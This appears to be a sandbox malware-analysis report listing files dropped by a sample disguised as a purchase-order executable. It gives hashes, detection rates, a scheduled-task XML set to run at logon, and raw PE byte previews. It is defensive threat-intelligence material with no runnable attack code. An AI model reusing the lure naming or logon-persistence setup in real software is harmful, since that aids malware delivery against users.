                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                        Process:C:\Users\user\Desktop\purchase order - PO-011024-201.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1301
                                        Entropy (8bit):5.334025345208678
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                        MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                        SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                        SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                        SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                        Malicious:true
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2232
                                        Entropy (8bit):5.379460230152629
                                        Encrypted:false
                                        SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:fLHyIFKL3IZ2KRH9Ougss
                                        MD5:47AE6B38874AA66FC6688784E5F2EF18
                                        SHA1:AF71A58235AE5D80BDDA79DE907697354E5553F6
                                        SHA-256:F271AAB7854518D80F39793CBA35D7BFDABBFBCAC9DBD8F5E79EAE393BDC4C98
                                        SHA-512:D8FD735141FBF25FE4EFB88E973F4416A50EC0E065A297BC8B398FF96AD77EE852EA2E66BD3CAFED7C4C9EE9D24742C3D95F03DD13DBC6C1B57BFDB2F40EF1A3
                                        Malicious:false
                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Users\user\AppData\Roaming\jDCErdK.exe
                                        File Type:XML 1.0 document, ASCII text
                                        Category:dropped
                                        Size (bytes):1573
                                        Entropy (8bit):5.110119248095621
                                        Encrypted:false
                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTBv
                                        MD5:C993DA026775D008D6DAE002CA580725
                                        SHA1:874A2E6007B94F1E45A38D65DD5D3673FB2E14AF
                                        SHA-256:4E6400DDA4404D133A9CEFB173535FBCC3C2E0A545F9C5C2EF9A7BD77B53F325
                                        SHA-512:8BF0DC8BC0C99F3766B8BB7E2B644C39F5F827BFCA241B7DA0A86CE64BEBF3B885674086B21EF8B959A2355ED9E8E5EA090D27B41A6BC7140526A201BA4A93B8
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                        Process:C:\Users\user\Desktop\purchase order - PO-011024-201.exe
                                        File Type:XML 1.0 document, ASCII text
                                        Category:dropped
                                        Size (bytes):1573
                                        Entropy (8bit):5.110119248095621
                                        Encrypted:false
                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTBv
                                        MD5:C993DA026775D008D6DAE002CA580725
                                        SHA1:874A2E6007B94F1E45A38D65DD5D3673FB2E14AF
                                        SHA-256:4E6400DDA4404D133A9CEFB173535FBCC3C2E0A545F9C5C2EF9A7BD77B53F325
                                        SHA-512:8BF0DC8BC0C99F3766B8BB7E2B644C39F5F827BFCA241B7DA0A86CE64BEBF3B885674086B21EF8B959A2355ED9E8E5EA090D27B41A6BC7140526A201BA4A93B8
                                        Malicious:true
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                        Process:C:\Users\user\Desktop\purchase order - PO-011024-201.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1000960
                                        Entropy (8bit):7.143847466881891
                                        Encrypted:false
                                        SSDEEP:12288:IB+YbtCIcFevvXu7HIlHEHoeCrhISRGOdv1NIbZVBR2Y1xGcCN74sUV2pIPdI7nV:cQ89lF1RGOd9NsXX2hNzUV2G8RQfk9
                                        MD5:62B9604FF6CE5A82D5270041DCD2F3FE
                                        SHA1:880C5CE3BB2F391B8FA2FF5764ED0DC905C3A9E6
                                        SHA-256:E3308F1DD36BD61758447D5C6EB6E90ADABC65E1119BBBE78537C3E3B622835C
                                        SHA-512:D09E5E215457173260FFFA63D0313645146214B720EB4917ACB642606022EB0148A2486EDE2D7272E06DB73AD0431AAFDA1EBC2A15FA36A759AFEDA1234E852B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 32%
                                        • Antivirus: Virustotal, Detection: 35%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9................0..(...........F... ...`....@.. ....................................@.................................SF..O....`...............6.. (..............p............................................ ............... ..H............text....&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc...............D..............@..B.................F......H............]......b........"..........................................&.(......*^.(........}......}....*z.(........}......}......}....*....0..[..........~....s........s......o....o......o.....o.......o........&.....o.........,..o........+..*.......0..;..........<J.......0..l........s.....~....s........s.............,...o....o......o.....o......s ......o!......o"...&....,..o.........+...*........GY.......0..g..........~....s........s......o....o......o.....o.......o........&
                                        Process:C:\Users\user\Desktop\purchase order - PO-011024-201.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3444
                                        Entropy (8bit):5.011954215267298
                                        Encrypted:false
                                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                        MD5:B133A676D139032A27DE3D9619E70091
                                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                        Malicious:false
                                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):48786
                                        Entropy (8bit):3.5854495362228453
                                        Encrypted:false
                                        SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                        MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                        SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                        SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                        SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                        Malicious:false
                                        Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):840878
                                        Entropy (8bit):3.4224066455051885
                                        Encrypted:false
                                        SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
                                        MD5:D3ED23A3E63ACA8CF656C585568DA6D7
                                        SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
                                        SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
                                        SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
                                        Malicious:false
                                        Preview:........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):840878
                                        Entropy (8bit):3.4224066455051885
                                        Encrypted:false
                                        SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
                                        MD5:D3ED23A3E63ACA8CF656C585568DA6D7
                                        SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
                                        SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
                                        SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
                                        Malicious:false
                                        Preview:........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):137550
                                        Entropy (8bit):3.409189992022338
                                        Encrypted:false
                                        SSDEEP:1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRtg:XBnfw8ld9+mRDaUR28oV7TY+7S0ba
                                        MD5:084B771A167854C5B38E25D4E199B637
                                        SHA1:AE6D36D4EC5A9E515E8735525BD80C96AC0F8122
                                        SHA-256:B3CF0050FAF325C36535D665C24411F3877E3667904DFE9D8A1C802ED4BCD56D
                                        SHA-512:426C15923F54EC93F22D9523B5CB6D326F727A34F5FF2BDE63D1CB3AD97CAB7E5B2ABABBC6ED5082B5E3140E9342A4E6F354359357A3F9AEF285278CB38A5835
                                        Malicious:false
                                        Preview:1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):715050
                                        Entropy (8bit):3.278818886805871
                                        Encrypted:false
                                        SSDEEP:3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRh:78M6d0w+WB6I
                                        MD5:342BC94F85E143BE85B5B997163A0BB3
                                        SHA1:8780CD88D169AE88C843E19239D9A32625F6A73E
                                        SHA-256:F7D40B4FADA44B2A5231780F99C3CE784BCF33866B59D5EB767EEA8E532AD2C4
                                        SHA-512:0A4ED9104CAFCE95E204B5505181816E7AA7941DED2694FF75EFABAAB821BF0F0FE5B32261ED213C710250B7845255F4E317D86A3A6D4C2C21F866207233C57E
                                        Malicious:false
